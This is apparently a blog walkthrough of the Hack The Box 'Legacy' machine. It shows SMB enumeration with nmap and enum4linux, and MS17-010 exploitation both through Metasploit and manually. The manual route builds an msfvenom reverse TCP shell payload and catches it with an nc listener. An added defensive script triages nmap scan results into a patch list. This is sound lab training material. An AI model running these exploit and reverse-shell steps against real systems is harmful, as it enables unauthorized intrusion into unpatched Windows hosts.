HTB – Legacy Walk-through

This is my first walk-through, for a very old machine from the Hack The Box platform. It is also my first box 🙂 We will see how we can root it both with Metasploit and manually.

At the time this blog post was written, Python 2 had reached EOL and was no longer maintained in the Debian repositories, so it is also no longer supported in Kali Linux. Below we will see a workaround for this so we can still use our favorite Python 2 exploits. So let’s start!

Information Gathering

First we need to scan the box, so we fire up nmap:

sudo nmap -A -Pn -vv -T4 -p- 10.129.80.232

We see the following results:

We see that two ports are open (139, 445), which are usually used by the SMB service. Also, most likely we have a Windows machine. More information is provided by the scripts that were triggered by the -A option.

Various info can be retrieved from these scripts, but for now we won’t use it. Since this is the only service available, we will enumerate it. First we use the enum4linux script:

enum4linux -a 10.129.80.232 

If you don’t receive enough information, like below, you might need to adjust your Samba configuration.

So we set our /etc/samba/smb.conf like below:

If we try to enumerate again we will see more info, but nothing that helps us significantly. Various access denied messages pop up.

We continue the enumeration with the nmap scripts specific to SMB services:

sudo nmap --script smb-vuln* -p 139,445 10.129.80.232

From these scripts we see two possible RCEs. We will take the route of exploring the second option (MS17-010). Note that we can also root the machine with MS08-067.
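From the defender's side, the same smb-vuln scan is what you would run against your own fleet to find hosts that still need patching. The script below is an added example, not part of the original walkthrough: it reads nmap's XML output (nmap -oX) and turns every smb-vuln finding reported as VULNERABLE into a per-host patch list; the embedded XML sample is constructed to mimic what the scan above produces.

```python
"""Triage nmap smb-vuln* results (nmap -oX output) into a per-host patch list."""
import re
import xml.etree.ElementTree as ET

# Remediation hints for the two findings the scan above reports (constructed mapping).
ADVICE = {
    "smb-vuln-ms17-010": "Apply the MS17-010 patch and disable SMBv1",
    "smb-vuln-ms08-067": "Apply the MS08-067 patch; host is end-of-life, isolate it",
}
VULN_STATES = {"VULNERABLE", "LIKELY VULNERABLE"}

def is_vulnerable(script):
    """nmap's vulns library records the state both as structured <elem key="state">
    and inside the human-readable output attribute; accept either form."""
    states = {e.text for e in script.iter("elem") if e.get("key") == "state"}
    if states & VULN_STATES:
        return True
    return re.search(r"State:\s*(LIKELY )?VULNERABLE", script.get("output", "")) is not None

def triage(xml_text):
    """Return {host_ip: [(script_id, advice), ...]} for hosts with smb-vuln findings."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for script in host.iter("script"):  # covers <hostscript> and port-level scripts
            sid = script.get("id", "")
            if sid.startswith("smb-vuln-") and is_vulnerable(script):
                advice = ADVICE.get(sid, "Apply the vendor patch for this bulletin")
                findings.setdefault(addr.get("addr"), []).append((sid, advice))
    return findings

# Constructed sample: one unpatched host and one patched host (IPs are placeholders).
SAMPLE_XML = """<nmaprun scanner="nmap">
<host><address addr="10.0.0.5" addrtype="ipv4"/><hostscript>
<script id="smb-vuln-ms17-010" output="&#10;  VULNERABLE:&#10;    State: VULNERABLE&#10;">
<table key="ms17-010"><elem key="state">VULNERABLE</elem></table></script>
<script id="smb-vuln-ms08-067" output="&#10;  VULNERABLE:&#10;    State: VULNERABLE&#10;"/>
<script id="smb-vuln-ms10-054" output="false"/>
</hostscript></host>
<host><address addr="10.0.0.6" addrtype="ipv4"/><hostscript>
<script id="smb-vuln-ms17-010" output="&#10;    State: NOT VULNERABLE&#10;"/>
</hostscript></host>
</nmaprun>"""

if __name__ == "__main__":
    for ip, items in triage(SAMPLE_XML).items():
        for sid, advice in items:
            print(f"{ip}\t{sid}\t{advice}")
```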

Exploitation Phase

Metasploit

Now we know some possible ways to get a foothold on the machine. Let’s see what we can find in Metasploit. We search with this:

search ms17-010

Some possible exploits come up. Since this is an old machine we need support for the 32-bit architecture, so we select the 4th exploit and leave the default payload, which is meterpreter. We set LHOST (our machine’s IP) and RHOSTS (the target IP), run it, and get our SYSTEM privilege shell.

Then we can navigate to the Administrator’s Desktop to get the flag.

The same goes for the user John.

Manual Exploitation

We search exploit-db for possible MS17-010 exploits:

searchsploit ms17-010 

From the results we see some possible exploits. Two are for x86 (32-bit) and we picked the second one at random. We copy it locally so we can modify it:

searchsploit -m 42315.py 

If we try to execute this against the target IP, we will receive various failures about missing dependencies. In order to install them we also need Python 2. We follow the directions from here to install Python 2 and pip. Then we set Python 2 as the active version and install the dependencies:

pyenv global 2.7.18
# pyenv versions        # list the available versions
# pyenv global system   # switch back to the system Python 3
# dependencies of the exploit script
pip2 install impacket
wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

Before we continue with modifying the Python script, we need to create a reverse TCP shell with msfvenom so we can send it to the target for execution. We do that with this command:

msfvenom -p windows/shell_reverse_tcp LHOST=<yourKaliIPhere> LPORT=443 -f exe > myshell.exe

Then we make the following changes in our script 42315.py:

Now we are ready to run it, but since this will open a reverse TCP shell we have to listen and wait for the connection on our machine, on the port we specified earlier in msfvenom:

sudo nc -vnlp 443

Then we run our script and get a root shell!

python2 42315.py 10.129.80.232

Have Fun!
